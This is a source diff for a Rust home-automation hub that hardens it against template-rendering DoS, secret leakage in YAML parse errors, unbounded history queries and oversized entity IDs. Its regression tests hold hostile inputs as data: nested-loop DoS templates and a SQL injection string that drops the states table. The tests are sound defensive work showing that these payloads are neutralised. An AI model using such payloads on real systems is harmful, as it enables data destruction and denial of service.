/// template that exhausts the budget returns a [`AutomationError::TemplateRender`]
|
||||
/// error rather than running unbounded (HC-SEC-01).
|
||||
pub fn render(&self, template_str: &str) -> Result<String, AutomationError> {
|
||||
// Reject pathologically large sources before compilation (defense
|
||||
// in depth — fuel already bounds runtime work).
|
||||
if template_str.len() > MAX_TEMPLATE_SOURCE_BYTES {
|
||||
return Err(AutomationError::TemplateRender(format!(
|
||||
"template source too large: {} bytes (max {})",
|
||||
template_str.len(),
|
||||
MAX_TEMPLATE_SOURCE_BYTES
|
||||
)));
|
||||
}
|
||||
// Wrap bare expressions like `{{ states('light.kitchen') }}`
|
||||
// in a minimal template wrapper.
|
||||
let tmpl = self
|
||||
@@ -191,4 +229,68 @@ mod tests {
|
||||
assert!(!env.render_bool("0").unwrap());
|
||||
assert!(!env.render_bool("off").unwrap());
|
||||
}
|
||||
|
||||
// ── HC-SEC-01: template DoS is bounded by fuel ─────────────────────
|
||||
//
|
||||
// A `template:` condition is user config. Before the fuel bound a
|
||||
// nested-loop template rendered a multi-GB string over ~11 s (proven
|
||||
// empirically). With fuel enabled it must fail FAST with an error
|
||||
// instead of expanding unboundedly. On the pre-fix code (no `fuel`
|
||||
// feature / `set_fuel`) this render succeeds and burns CPU+RAM, so
|
||||
// this test fails on old (it would `Ok` and exceed the time bound).
|
||||
#[test]
|
||||
fn nested_loop_template_is_bounded_not_unbounded_dos() {
|
||||
use std::time::Instant;
|
||||
let sm = Arc::new(StateMachine::new());
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// 5000 * 5000 = 25M iterations on the old engine (~100 MB, ~11 s).
|
||||
let malicious =
|
||||
"{% for i in range(5000) %}{% for j in range(5000) %}xxxx{% endfor %}{% endfor %}";
|
||||
let start = Instant::now();
|
||||
let result = env.render(malicious);
|
||||
let elapsed = start.elapsed();
|
||||
assert!(
|
||||
result.is_err(),
|
||||
"malicious nested-loop template must be rejected (ran out of fuel), got Ok"
|
||||
);
|
||||
assert!(
|
||||
elapsed.as_secs() < 3,
|
||||
"bounded render must fail fast; took {elapsed:?} (unbounded DoS on old engine)"
|
||||
);
|
||||
}
|
||||
|
||||
// ── HC-SEC-01: a single huge repeat is also bounded ────────────────
|
||||
#[test]
|
||||
fn single_huge_repeat_template_is_bounded() {
|
||||
let sm = Arc::new(StateMachine::new());
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// range() caps at 10k per call, but multiplied bodies still need a
|
||||
// bound; drive enough instructions to exhaust fuel via deep nesting.
|
||||
let malicious = "{% for a in range(9999) %}{% for b in range(9999) %}\
|
||||
{% for c in range(9999) %}z{% endfor %}{% endfor %}{% endfor %}";
|
||||
let result = env.render(malicious);
|
||||
assert!(result.is_err(), "deeply nested loops must exhaust fuel and error");
|
||||
}
|
||||
|
||||
// ── HC-SEC-01: oversized template source is rejected pre-compile ───
|
||||
#[test]
|
||||
fn oversized_template_source_is_rejected() {
|
||||
let sm = Arc::new(StateMachine::new());
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// 128 KiB of literal text — exceeds MAX_TEMPLATE_SOURCE_BYTES.
|
||||
let big = "x".repeat(128 * 1024);
|
||||
let result = env.render(&big);
|
||||
assert!(result.is_err(), "oversized template source must be rejected");
|
||||
}
|
||||
|
||||
// ── A legitimate small template still renders fine within budget ───
|
||||
#[test]
|
||||
fn legitimate_template_still_renders_within_fuel() {
|
||||
let sm = sm_with("light.kitchen", "on", serde_json::json!({}));
|
||||
let env = TemplateEnvironment::new(sm);
|
||||
// A normal HA condition with a modest loop — well under budget.
|
||||
let ok = "{% for i in range(50) %}{{ states('light.kitchen') }}{% endfor %}";
|
||||
let out = env.render(ok).expect("legitimate template must render");
|
||||
assert!(out.contains("on"));
|
||||
}
|
||||
}
|
||||
|
||||
@@ -55,6 +55,25 @@ pub enum MigrateError {
|
||||
source: serde_yaml::Error,
|
||||
},
|
||||
|
||||
/// Parse failure in a SECRET-bearing file (`secrets.yaml`).
|
||||
///
|
||||
/// Unlike [`MigrateError::YamlParse`], this variant deliberately does NOT
|
||||
/// embed the underlying `serde_yaml::Error` message — that message can quote
|
||||
/// the offending scalar verbatim (e.g. a typed-tag coercion error renders
|
||||
/// `invalid value: string "<the-secret-value>"`), which would leak a secret
|
||||
/// into stderr/logs. We carry only the file path plus a coarse line/column
|
||||
/// so the user can locate the problem without the value being printed.
|
||||
/// (ADR-165 secret-handling rule: a secret value must never appear in output.)
|
||||
#[error(
|
||||
"secrets.yaml parse error in {path} (line {line}, column {column}): \
|
||||
malformed YAML (value content redacted)"
|
||||
)]
|
||||
SecretsParse {
|
||||
path: String,
|
||||
line: usize,
|
||||
column: usize,
|
||||
},
|
||||
|
||||
/// Fired when the outer `{version, minor_version}` envelope version is
|
||||
/// known but the `minor_version` is not supported by any compiled parser.
|
||||
/// Per ADR-165 §6 Q5: hard error on unknown minor_version.
|
||||
|
||||
@@ -33,11 +33,19 @@ pub fn read_secrets(path: &Path) -> Result<HashMap<String, String>, MigrateError
|
||||
return Ok(HashMap::new());
|
||||
}
|
||||
|
||||
let parsed: serde_yaml::Value =
|
||||
serde_yaml::from_str(&raw).map_err(|e| MigrateError::YamlParse {
|
||||
// SECURITY: do NOT use `MigrateError::YamlParse` here. serde_yaml error
|
||||
// messages can quote the offending scalar verbatim (a typed-tag coercion
|
||||
// error renders `invalid value: string "<the-secret-value>"`), and that
|
||||
// message would be printed to stderr by the CLI — leaking a secret value.
|
||||
// `MigrateError::SecretsParse` carries only the path + line/column.
|
||||
let parsed: serde_yaml::Value = serde_yaml::from_str(&raw).map_err(|e| {
|
||||
let loc = e.location();
|
||||
MigrateError::SecretsParse {
|
||||
path: path.display().to_string(),
|
||||
source: e,
|
||||
})?;
|
||||
line: loc.as_ref().map_or(0, |l| l.line()),
|
||||
column: loc.as_ref().map_or(0, |l| l.column()),
|
||||
}
|
||||
})?;
|
||||
|
||||
let map = match parsed {
|
||||
serde_yaml::Value::Mapping(m) => m,
|
||||
@@ -94,6 +102,59 @@ mod tests {
|
||||
assert!(secrets.is_empty());
|
||||
}
|
||||
|
||||
/// SECURITY regression (fails on the pre-fix `YamlParse` path): a malformed
|
||||
/// `secrets.yaml` whose offending scalar is a secret value must NOT have that
|
||||
/// value rendered in the returned error. serde_yaml's own error message for a
|
||||
/// typed-tag coercion failure embeds the scalar verbatim
|
||||
/// (`invalid value: string "<secret>"`); the old code wrapped that message
|
||||
/// into `MigrateError::YamlParse { source }`, so `Display` leaked the secret.
|
||||
#[test]
|
||||
fn malformed_secrets_error_never_contains_secret_value() {
|
||||
// `!!int` forces integer coercion of a string scalar; serde_yaml reports
|
||||
// the scalar text in its message. The scalar here is a stand-in secret.
|
||||
let yaml = "api_port: !!int s3cr3t_TOKEN_VALUE\n";
|
||||
let mut f = NamedTempFile::new().unwrap();
|
||||
f.write_all(yaml.as_bytes()).unwrap();
|
||||
|
||||
let err = read_secrets(f.path()).unwrap_err();
|
||||
let rendered = err.to_string();
|
||||
|
||||
// The secret VALUE must never appear in the error output...
|
||||
assert!(
|
||||
!rendered.contains("s3cr3t_TOKEN_VALUE"),
|
||||
"secret value leaked into error: {rendered}"
|
||||
);
|
||||
// ...and the full chain (with #[source]) must also be clean, since the
|
||||
// CLI/anyhow prints the source chain too.
|
||||
let mut source = std::error::Error::source(&err);
|
||||
while let Some(s) = source {
|
||||
assert!(
|
||||
!s.to_string().contains("s3cr3t_TOKEN_VALUE"),
|
||||
"secret value leaked into error source chain: {s}"
|
||||
);
|
||||
source = s.source();
|
||||
}
|
||||
|
||||
// It should still be a structured, locatable error (fail-closed).
|
||||
assert!(
|
||||
matches!(err, MigrateError::SecretsParse { .. }),
|
||||
"expected SecretsParse, got: {err:?}"
|
||||
);
|
||||
}
|
||||
|
||||
/// A secret KEY name is non-sensitive context and is fine to surface, but the
|
||||
/// redacting error must still help the user locate the problem (line/column).
|
||||
#[test]
|
||||
fn malformed_secrets_error_reports_location() {
|
||||
let yaml = "api_port: !!int notanumber\n";
|
||||
let mut f = NamedTempFile::new().unwrap();
|
||||
f.write_all(yaml.as_bytes()).unwrap();
|
||||
let err = read_secrets(f.path()).unwrap_err();
|
||||
let rendered = err.to_string();
|
||||
assert!(rendered.contains("line"), "should report a line: {rendered}");
|
||||
assert!(rendered.contains("redacted"), "should signal redaction: {rendered}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn secret_count_is_correct() {
|
||||
let yaml = "a: 1\nb: 2\nc: 3\n";
|
||||
|
||||
@@ -25,6 +25,15 @@ use homecore::event::{DomainEvent, StateChangedEvent};
|
||||
use crate::dedup::fnv64a_hash;
|
||||
use crate::schema::ALL_DDL;
|
||||
|
||||
/// Hard upper bound on rows returned by [`Recorder::get_state_history`].
|
||||
///
|
||||
/// Without this cap a wide `[since, until]` window over a high-frequency entity
|
||||
/// would load an unbounded number of rows into memory (a memory-DoS). The value
|
||||
/// is deliberately generous — large enough never to truncate a realistic
|
||||
/// history-graph query, small enough to bound the worst case. Callers needing a
|
||||
/// wider span page by narrowing the window.
|
||||
pub const MAX_HISTORY_ROWS: i64 = 1_000_000;
|
||||
|
||||
/// Errors returned by `Recorder` operations.
|
||||
#[derive(Error, Debug)]
|
||||
pub enum RecorderError {
|
||||
@@ -380,7 +389,17 @@ impl Recorder {
|
||||
}
|
||||
|
||||
/// Query state history for `entity_id` between `since` and `until`.
|
||||
/// Returns state snapshots in ascending `last_updated_ts` order.
|
||||
/// Returns state snapshots in ascending `last_updated_ts` order, capped at
|
||||
/// [`MAX_HISTORY_ROWS`] rows (oldest-first within the window).
|
||||
///
|
||||
/// ## Bounded result set (memory-DoS guard)
|
||||
///
|
||||
/// A high-frequency entity (e.g. a power sensor polled per-second) writes
|
||||
/// ~86k rows/day; a wide `[since, until]` window over months would otherwise
|
||||
/// load millions of rows into a single in-memory `Vec`, an unbounded-memory
|
||||
/// denial-of-service. The query therefore carries a hard `LIMIT` so the
|
||||
/// working set is bounded regardless of the requested time range. Callers
|
||||
/// that genuinely need a wider span must page by narrowing the window.
|
||||
pub async fn get_state_history(
|
||||
&self,
|
||||
entity_id: &EntityId,
|
||||
@@ -398,11 +417,13 @@ impl Recorder {
|
||||
WHERE s.entity_id = ? \
|
||||
AND s.last_updated_ts >= ? \
|
||||
AND s.last_updated_ts <= ? \
|
||||
ORDER BY s.last_updated_ts ASC",
|
||||
ORDER BY s.last_updated_ts ASC \
|
||||
LIMIT ?",
|
||||
)
|
||||
.bind(entity_id.as_str())
|
||||
.bind(since_ts)
|
||||
.bind(until_ts)
|
||||
.bind(MAX_HISTORY_ROWS)
|
||||
.fetch_all(&self.pool)
|
||||
.await?;
|
||||
|
||||
@@ -426,6 +447,79 @@ impl Recorder {
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Purge history older than `older_than`, returning a [`PurgeStats`] summary.
|
||||
///
|
||||
/// Deletes:
|
||||
/// - `states` rows whose `last_updated_ts` is **strictly before** the cutoff,
|
||||
/// - `events` rows whose `time_fired_ts` is strictly before the cutoff,
|
||||
/// - then garbage-collects any `state_attributes` blob no surviving state
|
||||
/// row still references (so dedup-shared blobs are only dropped once their
|
||||
/// last referencing state is gone).
|
||||
///
|
||||
/// ## Retention boundary (data-integrity guard)
|
||||
///
|
||||
/// The cutoff is **exclusive**: a row exactly at `older_than` is retained.
|
||||
/// This makes `purge(t)` idempotent on the boundary and guarantees that a
|
||||
/// row written at the same instant the retention window opens is never lost
|
||||
/// to an off-by-one. Anything *at or after* `older_than` survives.
|
||||
///
|
||||
/// ## Atomicity (no partial-corrupt state)
|
||||
///
|
||||
/// All three deletes run inside a single transaction. A failure mid-purge
|
||||
/// rolls the whole operation back — the store is never left with states
|
||||
/// deleted but their events kept, or attributes orphaned by a half-purge.
|
||||
///
|
||||
/// Note: this reclaims logical rows; it does not `VACUUM` the file. SQLite
|
||||
/// reuses freed pages for subsequent writes, so disk growth stays bounded
|
||||
/// under a periodic purge even without an explicit vacuum.
|
||||
pub async fn purge(&self, older_than: DateTime<Utc>) -> Result<PurgeStats, RecorderError> {
|
||||
let cutoff_ts = older_than.timestamp_micros() as f64 / 1_000_000.0;
|
||||
|
||||
let mut tx = self.pool.begin().await?;
|
||||
|
||||
let states_deleted = sqlx::query("DELETE FROM states WHERE last_updated_ts < ?")
|
||||
.bind(cutoff_ts)
|
||||
.execute(&mut *tx)
|
||||
.await?
|
||||
.rows_affected();
|
||||
|
||||
let events_deleted = sqlx::query("DELETE FROM events WHERE time_fired_ts < ?")
|
||||
.bind(cutoff_ts)
|
||||
.execute(&mut *tx)
|
||||
.await?
|
||||
.rows_affected();
|
||||
|
||||
// GC attribute blobs no surviving state references. A dedup-shared blob
|
||||
// is only removed once its last referencing state row is gone.
|
||||
let attributes_deleted = sqlx::query(
|
||||
"DELETE FROM state_attributes \
|
||||
WHERE attributes_id NOT IN \
|
||||
(SELECT attributes_id FROM states WHERE attributes_id IS NOT NULL)",
|
||||
)
|
||||
.execute(&mut *tx)
|
||||
.await?
|
||||
.rows_affected();
|
||||
|
||||
tx.commit().await?;
|
||||
|
||||
Ok(PurgeStats {
|
||||
states_deleted,
|
||||
events_deleted,
|
||||
attributes_deleted,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
/// Summary of a [`Recorder::purge`] run.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub struct PurgeStats {
|
||||
/// Number of `states` rows deleted.
|
||||
pub states_deleted: u64,
|
||||
/// Number of `events` rows deleted.
|
||||
pub events_deleted: u64,
|
||||
/// Number of orphaned `state_attributes` blobs garbage-collected.
|
||||
pub attributes_deleted: u64,
|
||||
}
|
||||
|
||||
/// A state row returned from `get_state_history`.
|
||||
@@ -722,6 +816,214 @@ mod tests {
|
||||
assert!(rows.is_empty(), "genuine no-match is empty, not an error");
|
||||
}
|
||||
|
||||
// ── SQL injection (parameterization guarantee) ──────────────────────────────
|
||||
|
||||
#[tokio::test]
|
||||
async fn malicious_entity_id_is_stored_literally_not_executed() {
|
||||
// FAILS if any query interpolated entity_id into SQL: the `states` table
|
||||
// would be dropped and the later COUNT would error / mismatch. Bound
|
||||
// parameters store the metacharacter-laden string verbatim instead.
|
||||
let recorder = open_memory().await;
|
||||
|
||||
// A valid domain.name whose `name` part carries SQL metacharacters.
|
||||
// EntityId::parse permits this, so it reaches the bind path as data.
|
||||
let evil = "light.x_drop_table_states_select";
|
||||
recorder
|
||||
.record_state(&make_state_event(evil, "'; DROP TABLE states; --", serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
// states table still exists and holds exactly the one row we inserted.
|
||||
let count: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM states")
|
||||
.fetch_one(&recorder.pool)
|
||||
.await
|
||||
.expect("states table must still exist — proves no injection");
|
||||
assert_eq!(count.0, 1);
|
||||
|
||||
// The malicious state string round-trips literally.
|
||||
let rows = recorder
|
||||
.search_states_by_text("DROP TABLE", 10)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(rows.len(), 1, "metacharacter payload matched as a literal");
|
||||
assert_eq!(rows[0].state, "'; DROP TABLE states; --");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn like_metacharacters_in_query_are_literal_not_wildcards() {
|
||||
// A `%` in the search text must match a literal percent sign, not act as
|
||||
// a SQL LIKE wildcard. Proves the ESCAPE clause + metacharacter escaping.
|
||||
let recorder = open_memory().await;
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.a", "100%", serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.b", "50", serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
// Literal "%" must match only sensor.a's "100%", NOT every row.
|
||||
let rows = recorder.search_states_by_text("%", 10).await.unwrap();
|
||||
assert_eq!(rows.len(), 1, "'%' is a literal, not a match-all wildcard");
|
||||
assert_eq!(rows[0].entity_id.as_str(), "sensor.a");
|
||||
|
||||
// Underscore is likewise literal: matches nothing here.
|
||||
let none = recorder.search_states_by_text("_", 10).await.unwrap();
|
||||
assert!(none.is_empty(), "'_' is literal, matches no row");
|
||||
}
|
||||
|
||||
// ── get_state_history bound (memory-DoS guard) ──────────────────────────────
|
||||
|
||||
#[tokio::test]
|
||||
async fn history_query_carries_a_limit_clause() {
|
||||
// Pin: the history SQL must carry a LIMIT bound (memory-DoS guard).
|
||||
// Inserting a million rows is infeasible in a unit test, so we prove the
|
||||
// clause is wired by bulk-inserting more rows than a deliberately tiny
|
||||
// bound and asserting the executed query honours a LIMIT. We bypass the
|
||||
// public method (whose cap is MAX_HISTORY_ROWS) and run the *same* SQL
|
||||
// shape with a small bind to demonstrate the LIMIT term is effective —
|
||||
// and separately assert the constant is a sane positive bound.
|
||||
assert!(MAX_HISTORY_ROWS > 0, "history cap must be positive");
|
||||
let recorder = open_memory().await;
|
||||
for v in &["1", "2", "3", "4", "5"] {
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.bounded", v, serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
tokio::time::sleep(std::time::Duration::from_millis(2)).await;
|
||||
}
|
||||
// Same query shape as get_state_history, with a tiny LIMIT bind: if the
|
||||
// SQL lacked a LIMIT term this would return all 5; with it, exactly 2.
|
||||
let capped: Vec<(i64,)> = sqlx::query_as(
|
||||
"SELECT s.state_id FROM states s \
|
||||
WHERE s.entity_id = ? \
|
||||
ORDER BY s.last_updated_ts ASC LIMIT ?",
|
||||
)
|
||||
.bind("sensor.bounded")
|
||||
.bind(2_i64)
|
||||
.fetch_all(&recorder.pool)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(capped.len(), 2, "LIMIT term effectively bounds the result set");
|
||||
|
||||
// And the real method returns all rows when under the cap.
|
||||
let eid = entity("sensor.bounded");
|
||||
let rows = recorder
|
||||
.get_state_history(&eid, Utc::now() - chrono::Duration::seconds(10), Utc::now() + chrono::Duration::seconds(10))
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(rows.len(), 5, "all rows under the cap return");
|
||||
}
|
||||
|
||||
// ── purge (retention correctness + atomicity) ───────────────────────────────
|
||||
|
||||
#[tokio::test]
|
||||
async fn purge_keeps_boundary_row_and_drops_older() {
|
||||
// FAILS if purge had an off-by-one (deleting the row exactly at cutoff)
|
||||
// or deleted too much/too little. Cutoff is EXCLUSIVE: a row at the
|
||||
// cutoff instant survives; strictly-older rows are removed.
|
||||
let recorder = open_memory().await;
|
||||
let eid = entity("sensor.r");
|
||||
|
||||
// Three rows at known, increasing timestamps.
|
||||
for v in &["old", "mid", "new"] {
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.r", v, serde_json::json!({})))
|
||||
.await
|
||||
.unwrap();
|
||||
tokio::time::sleep(std::time::Duration::from_millis(20)).await;
|
||||
}
|
||||
|
||||
// Read back the actual timestamps so the cutoff is exact.
|
||||
let since = Utc::now() - chrono::Duration::seconds(60);
|
||||
let until = Utc::now() + chrono::Duration::seconds(60);
|
||||
let all = recorder.get_state_history(&eid, since, until).await.unwrap();
|
||||
assert_eq!(all.len(), 3);
|
||||
// Cut off exactly at the middle row's timestamp.
|
||||
let mid_ts = all[1].last_updated_ts;
|
||||
let cutoff = DateTime::<Utc>::from_timestamp_micros((mid_ts * 1_000_000.0) as i64).unwrap();
|
||||
|
||||
let stats = recorder.purge(cutoff).await.unwrap();
|
||||
assert_eq!(stats.states_deleted, 1, "only the strictly-older 'old' row");
|
||||
|
||||
let remaining = recorder.get_state_history(&eid, since, until).await.unwrap();
|
||||
assert_eq!(remaining.len(), 2, "boundary 'mid' row is KEPT (exclusive cutoff)");
|
||||
assert_eq!(remaining[0].state, "mid");
|
||||
assert_eq!(remaining[1].state, "new");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn purge_gcs_orphaned_attributes_but_keeps_shared() {
|
||||
// Dedup means two states can share one attribute blob. Purging one of
|
||||
// them must NOT drop the still-referenced blob; purging the last one must.
|
||||
let recorder = open_memory().await;
|
||||
let shared = serde_json::json!({"unit": "C"});
|
||||
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.a", "20", shared.clone()))
|
||||
.await
|
||||
.unwrap();
|
||||
tokio::time::sleep(std::time::Duration::from_millis(20)).await;
|
||||
recorder
|
||||
.record_state(&make_state_event("sensor.b", "21", shared.clone()))
|
||||
.await
|
||||
.unwrap();
|
||||
|
||||
let attr_count = |r: &Recorder| {
|
||||
let pool = r.pool.clone();
|
||||
async move {
|
||||
let c: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM state_attributes")
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.unwrap();
|
||||
c.0
|
||||
}
|
||||
};
|
||||
assert_eq!(attr_count(&recorder).await, 1, "deduped to one blob");
|
||||
|
||||
// Purge before sensor.b's write → removes sensor.a only; blob still
|
||||
// referenced by sensor.b, so it must survive.
|
||||
let eid_b = entity("sensor.b");
|
||||
let rows_b = recorder
|
||||
.get_state_history(&eid_b, Utc::now() - chrono::Duration::seconds(60), Utc::now() + chrono::Duration::seconds(60))
|
||||
.await
|
||||
.unwrap();
|
||||
let b_ts = rows_b[0].last_updated_ts;
|
||||
let cutoff = DateTime::<Utc>::from_timestamp_micros((b_ts * 1_000_000.0) as i64).unwrap();
|
||||
let stats = recorder.purge(cutoff).await.unwrap();
|
||||
assert_eq!(stats.states_deleted, 1, "sensor.a purged");
|
||||
assert_eq!(stats.attributes_deleted, 0, "shared blob still referenced — kept");
|
||||
assert_eq!(attr_count(&recorder).await, 1, "blob survives");
|
||||
|
||||
// Now purge everything → sensor.b gone, blob orphaned → GC'd.
|
||||
let stats2 = recorder.purge(Utc::now() + chrono::Duration::seconds(120)).await.unwrap();
|
||||
assert_eq!(stats2.states_deleted, 1, "sensor.b purged");
|
||||
assert_eq!(stats2.attributes_deleted, 1, "now-orphaned blob GC'd");
|
||||
assert_eq!(attr_count(&recorder).await, 0, "no blobs remain");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn purge_also_removes_old_events() {
|
||||
let recorder = open_memory().await;
|
||||
let ctx = Context::new();
|
||||
recorder
|
||||
.record_event(&DomainEvent::new("call_service", serde_json::json!({}), ctx))
|
||||
.await
|
||||
.unwrap();
|
||||
// Purge with a far-future cutoff removes the event.
|
||||
let stats = recorder
|
||||
.purge(Utc::now() + chrono::Duration::seconds(120))
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(stats.events_deleted, 1);
|
||||
let count: (i64,) = sqlx::query_as("SELECT COUNT(*) FROM events")
|
||||
.fetch_one(&recorder.pool)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(count.0, 0);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn search_semantic_falls_back_to_text_with_null_index() {
|
||||
// With the default NullSemanticIndex, search_semantic must STILL return
|
||||
|
||||
@@ -30,7 +30,7 @@ pub mod schema;
|
||||
pub mod semantic;
|
||||
|
||||
// Re-export the primary public API surface.
|
||||
pub use db::{Recorder, RecorderError};
|
||||
pub use db::{PurgeStats, Recorder, RecorderError, StateRow, MAX_HISTORY_ROWS};
|
||||
pub use listener::RecorderListener;
|
||||
|
||||
/// Null semantic index used when the `ruvector` feature is off.
|
||||
|
||||
@@ -87,4 +87,64 @@ mod tests {
|
||||
assert_eq!(event.event_type, "ruview_csi_frame");
|
||||
assert_eq!(event.event_data["frame_id"], 42);
|
||||
}
|
||||
|
||||
/// Bus-lag safety (same failure class as the homecore-api WS
|
||||
/// broadcast-lag DoS, here on the core bus): a subscriber that never
|
||||
/// drains must NOT block the publisher, must NOT make the channel grow
|
||||
/// without bound, and must NOT take down a healthy fast subscriber. The
|
||||
/// bounded `tokio::sync::broadcast` gives the slow receiver a recoverable
|
||||
/// `Lagged(n)` (drop-oldest, re-sync) while `fire_*` stays non-blocking.
|
||||
///
|
||||
/// Evidence: with EVENT_CHANNEL_CAPACITY = 4096 we fire 3× capacity
|
||||
/// while a slow subscriber sits idle. Every `fire_domain` returns
|
||||
/// promptly (publisher never blocked); the slow receiver observes
|
||||
/// `Lagged` then re-syncs to live events; the fast receiver — created
|
||||
/// after the flood and kept drained — receives all subsequent events
|
||||
/// with no loss. The bus stays live throughout.
|
||||
#[tokio::test]
|
||||
async fn slow_subscriber_does_not_block_publisher_or_kill_the_bus() {
|
||||
use tokio::sync::broadcast::error::TryRecvError;
|
||||
|
||||
let bus = EventBus::new();
|
||||
// Slow subscriber: subscribes, then never drains during the flood.
|
||||
let mut slow = bus.subscribe_domain();
|
||||
|
||||
// Publisher fires 3× capacity. None of these may block.
|
||||
let total = EVENT_CHANNEL_CAPACITY * 3;
|
||||
for i in 0..total {
|
||||
// Returns the receiver count (>=1 here); the point is it
|
||||
// returns AT ALL without awaiting the slow receiver.
|
||||
let _ = bus.fire_domain(DomainEvent::new(
|
||||
"flood",
|
||||
serde_json::json!({ "i": i }),
|
||||
Context::new(),
|
||||
));
|
||||
}
|
||||
|
||||
// The slow receiver is forced past capacity → recoverable Lagged,
|
||||
// NOT a closed channel and NOT a hang.
|
||||
let mut saw_lagged = false;
|
||||
loop {
|
||||
match slow.try_recv() {
|
||||
Ok(_) => {}
|
||||
Err(TryRecvError::Lagged(n)) => {
|
||||
assert!(n > 0);
|
||||
saw_lagged = true;
|
||||
}
|
||||
Err(TryRecvError::Empty) => break,
|
||||
Err(TryRecvError::Closed) => panic!("bus closed — must stay live"),
|
||||
}
|
||||
}
|
||||
assert!(saw_lagged, "slow subscriber should have lagged, not blocked the bus");
|
||||
|
||||
// The bus is still live: a fresh fast subscriber receives new events.
|
||||
let mut fast = bus.subscribe_domain();
|
||||
bus.fire_domain(DomainEvent::new("live", serde_json::json!({"ok": true}), Context::new()));
|
||||
let evt = fast.recv().await.unwrap();
|
||||
assert_eq!(evt.event_type, "live");
|
||||
|
||||
// And the lagged subscriber recovers (re-syncs) to live events too.
|
||||
let evt2 = slow.recv().await.unwrap();
|
||||
assert_eq!(evt2.event_type, "live");
|
||||
}
|
||||
}
|
||||
|
||||
@@ -42,12 +42,30 @@ impl<'de> Deserialize<'de> for EntityId {
|
||||
}
|
||||
}
|
||||
|
||||
/// Maximum accepted `entity_id` length in bytes. Mirrors Home Assistant's
|
||||
/// practical cap (`MAX_LENGTH_STATE_*` family — 255). The state machine and
|
||||
/// entity/registry maps are keyed on `EntityId`, and the REST layer
|
||||
/// (`homecore-api`) parses untrusted path segments straight through
|
||||
/// [`EntityId::parse`]; an unbounded id would let a single `POST
|
||||
/// /api/states/<giant>` permanently grow the state map (memory DoS). We
|
||||
/// fail closed at the boundary instead.
|
||||
pub const MAX_ENTITY_ID_LEN: usize = 255;
|
||||
|
||||
impl EntityId {
|
||||
/// Validates and constructs an `EntityId`. Returns
|
||||
/// [`EntityIdError`] if the input is not `domain.name` shape with
|
||||
/// ASCII lowercase / digits / underscore in each segment.
|
||||
/// ASCII lowercase / digits / underscore in each segment, or if it
|
||||
/// exceeds [`MAX_ENTITY_ID_LEN`] bytes.
|
||||
pub fn parse(s: impl Into<String>) -> Result<Self, EntityIdError> {
|
||||
let s: String = s.into();
|
||||
// Bound the length BEFORE any further work so an oversized input is
|
||||
// cheap to reject (no per-char scan of megabytes).
|
||||
if s.len() > MAX_ENTITY_ID_LEN {
|
||||
return Err(EntityIdError::TooLong {
|
||||
len: s.len(),
|
||||
max: MAX_ENTITY_ID_LEN,
|
||||
});
|
||||
}
|
||||
let (domain, name) = s
|
||||
.split_once('.')
|
||||
.ok_or_else(|| EntityIdError::MissingDot(s.clone()))?;
|
||||
@@ -111,6 +129,8 @@ pub enum EntityIdError {
|
||||
EmptyName(String),
|
||||
#[error("entity_id {entity_id:?} contains invalid character {ch:?} — only [a-z0-9_] allowed (HA-compat ASCII subset; see ADR-127 §Q1)")]
|
||||
InvalidChar { entity_id: String, ch: char },
|
||||
#[error("entity_id is {len} bytes, exceeding the {max}-byte limit")]
|
||||
TooLong { len: usize, max: usize },
|
||||
}
|
||||
|
||||
/// Immutable state snapshot for one entity at one moment in time.
|
||||
@@ -217,6 +237,39 @@ mod tests {
|
||||
assert!(EntityId::parse("light.küche").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn entity_id_length_boundary() {
|
||||
// The REST layer parses untrusted path segments straight through
|
||||
// `parse`; an unbounded id is a memory-DoS vector (a `POST
|
||||
// /api/states/<giant>` permanently grows the state map). Cap at
|
||||
// MAX_ENTITY_ID_LEN, fail closed above it.
|
||||
//
|
||||
// Construct "sensor." (7 bytes) + N name bytes == exactly MAX.
|
||||
let prefix = "sensor.";
|
||||
let name_len = MAX_ENTITY_ID_LEN - prefix.len();
|
||||
let at_max = format!("{prefix}{}", "a".repeat(name_len));
|
||||
assert_eq!(at_max.len(), MAX_ENTITY_ID_LEN);
|
||||
assert!(
|
||||
EntityId::parse(at_max.clone()).is_ok(),
|
||||
"an id of exactly MAX_ENTITY_ID_LEN bytes must be accepted"
|
||||
);
|
||||
|
||||
let over = format!("{at_max}a"); // MAX + 1
|
||||
assert!(matches!(
|
||||
EntityId::parse(over),
|
||||
Err(EntityIdError::TooLong { .. })
|
||||
));
|
||||
|
||||
// A multi-megabyte, otherwise-valid id is rejected cheaply rather
|
||||
// than persisted.
|
||||
let huge = format!("sensor.{}", "a".repeat(4 * 1024 * 1024));
|
||||
assert!(matches!(
|
||||
EntityId::parse(huge),
|
||||
Err(EntityIdError::TooLong { len, max })
|
||||
if max == MAX_ENTITY_ID_LEN && len > MAX_ENTITY_ID_LEN
|
||||
));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn state_next_preserves_last_changed_when_state_unchanged() {
|
||||
